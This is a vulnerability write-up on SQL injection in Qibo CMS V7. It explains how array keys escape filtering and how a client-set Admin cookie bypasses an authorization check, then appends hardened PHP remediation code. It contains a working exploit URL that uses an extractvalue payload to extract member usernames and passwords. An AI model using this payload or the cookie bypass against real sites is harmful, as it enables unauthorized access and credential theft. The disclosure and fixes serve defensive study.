Qibo cmsV7 full-site system SQL Injection
Isn't the logic here slightly off?
http://down.qibosoft.com/down.php?v=v7
The problem was found in the downloaded package.
function Add_S($array){
    foreach($array as $key=>$value){
        if(!is_array($value)){
            @eregi("['\"&]+",$key) && die('error KEY!');
            $value=str_replace("&#x","& # x",$value);        // filter unsafe characters
            $value=preg_replace("/eval/i","eva l",$value);   // filter unsafe functions
            !get_magic_quotes_gpc() && $value=addslashes($value);
            $array[$key]=$value;
        }else{
            $array[$key]=Add_S($array[$key]);
        }
    }
    return $array;
}
@eregi("['\"&]+",$key) && die('error KEY!');
The array keys are not filtered properly: the key check only runs in the branch where the value is not an array.
If a nested array such as [1'][2] is submitted, the outer key 1' has an array value, so it goes straight into the recursive call and is never matched; only the inner key 2 is checked, and it passes without exiting.
__________________________________________________________________
inc/label_module.php
if($jobs=='show'){
    if(!$_COOKIE[Admin]&&!$web_admin){
        showerr("You are not authorized to view");
    }
    // get the header and footer labels
    preg_replace('/\$label\[([\'a-zA-Z0-9\_]+)\]/eis',"label_array_hf('\\1')",read_file(getTpl("head",$head_tpl)));
    preg_replace('/\$label\[([\'a-zA-Z0-9\_]+)\]/eis',"label_array_hf('\\1')",read_file(getTpl("foot",$foot_tpl)));
    // $label_hf holds the array of labels found in the header and footer
    is_array($label_hf) || $label_hf=array();
    foreach($label_hf AS $key=>$value){
        $rs=$db->get_one("SELECT * FROM {$pre}label WHERE tag='$key' AND chtype='99'");
if(!$_COOKIE[Admin]&&!$web_admin){showerr("You are not authorized to view");}
Presumably only the administrator is supposed to be able to view this.
However, here no login is required at all, not even a member login.
Because && is used here, the check only exits when both conditions hold; as long as one of them is not satisfied, it does not exit.
$web_admin cannot be controlled here.
However, $_COOKIE[Admin] can be controlled directly.
So set $_COOKIE[Admin] to 1 and the check does not exit.
There is no need to log on; just modify the cookie.
Once the cookie is modified, the check no longer exits.
foreach($label_hf AS $key=>$value){
    $rs=$db->get_one("SELECT * FROM {$pre}label WHERE tag='$key' AND chtype='99'");
    if($rs[tag])
The array keys are then placed directly into the query.
Because array keys are not passed through addslashes, this combines with the key-check bypass above to give SQL injection.
http://www.test.com/v7/index.php?jobs=show&label_hf[1' and extractvalue(1,concat(0x5c,(select concat(username,password) from qb_members limit 1)%23][2]=asd
The injection succeeds.
Solution:
Filter the input properly, including array keys.
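As an added example (not Qibo's code and not the writeup author's), here are the three fixes a defender would apply to the code above, in PHP: a replacement for Add_S() that validates every key before branching on the value type, so a quoted key whose value is an array can no longer skip the check through the recursive branch; the label lookup with the tag bound as a prepared-statement parameter instead of interpolated into the SQL string; and an authorization check that takes its decision from server-side state rather than a client-writable cookie. The names add_s_hardened(), find_label() and can_view_labels(), the $session['is_admin'] flag and the key allowlist [A-Za-z0-9_] are assumptions made for this example and should be adapted to the application's real key format and session handling.

```php
<?php
// Added example, not Qibo's code. Assumed names: add_s_hardened(),
// find_label(), can_view_labels(); the key allowlist and the
// $session['is_admin'] flag are assumptions for illustration only.

/**
 * Recursive input sanitizer. Unlike the original Add_S(), the key is
 * validated BEFORE looking at the value, so a key such as "1'" whose value
 * is a nested array is rejected instead of slipping into the recursion.
 */
function add_s_hardened(array $array): array
{
    $clean = [];
    foreach ($array as $key => $value) {
        // Allowlist (assumed format) instead of the original blocklist of ' " &.
        if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', (string) $key)) {
            throw new InvalidArgumentException(
                'error KEY: ' . var_export($key, true)
            );
        }
        if (is_array($value)) {
            $clean[$key] = add_s_hardened($value);   // same rule at every depth
        } else {
            $value = str_replace('&#x', '& # x', (string) $value);
            $value = preg_replace('/eval/i', 'eva l', $value);
            // get_magic_quotes_gpc() was removed in PHP 8, so the escaping
            // decision is made unconditionally here.
            $clean[$key] = addslashes($value);
        }
    }
    return $clean;
}

/**
 * Label lookup with the tag bound as a parameter rather than interpolated.
 * $pre is the configured table prefix, not request data.
 */
function find_label(PDO $db, string $pre, string $tag): ?array
{
    $sql  = "SELECT * FROM {$pre}label WHERE tag = :tag AND chtype = '99'";
    $stmt = $db->prepare($sql);
    $stmt->execute([':tag' => $tag]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Authorization decided from server-side state only. The original code
 * trusted $_COOKIE[Admin], which the client sets. $session['is_admin'] is an
 * assumed server-side flag standing in for the application's real session data.
 */
function can_view_labels(array $session, bool $web_admin): bool
{
    return $web_admin || !empty($session['is_admin']);
}

// Constructed request data in the shape the writeup describes: the quote
// sits in an outer key whose value is itself an array.
$constructed = ['label_hf' => ["1'" => ['2' => 'asd']]];
try {
    add_s_hardened($constructed);
    echo "accepted\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

// Ordinary keys still pass, and scalar values are escaped as before.
print_r(add_s_hardened(['label_hf' => ['header' => ['title' => "O'Reilly"]]]));
```

Run it with the PHP CLI: the constructed nested-key input is rejected by add_s_hardened() before any value is processed, while ordinary keys pass through with their values escaped. Binding the tag in find_label() turns key validation into defense in depth rather than the only barrier between request data and the query, and can_view_labels() removes the cookie from the authorization decision entirely.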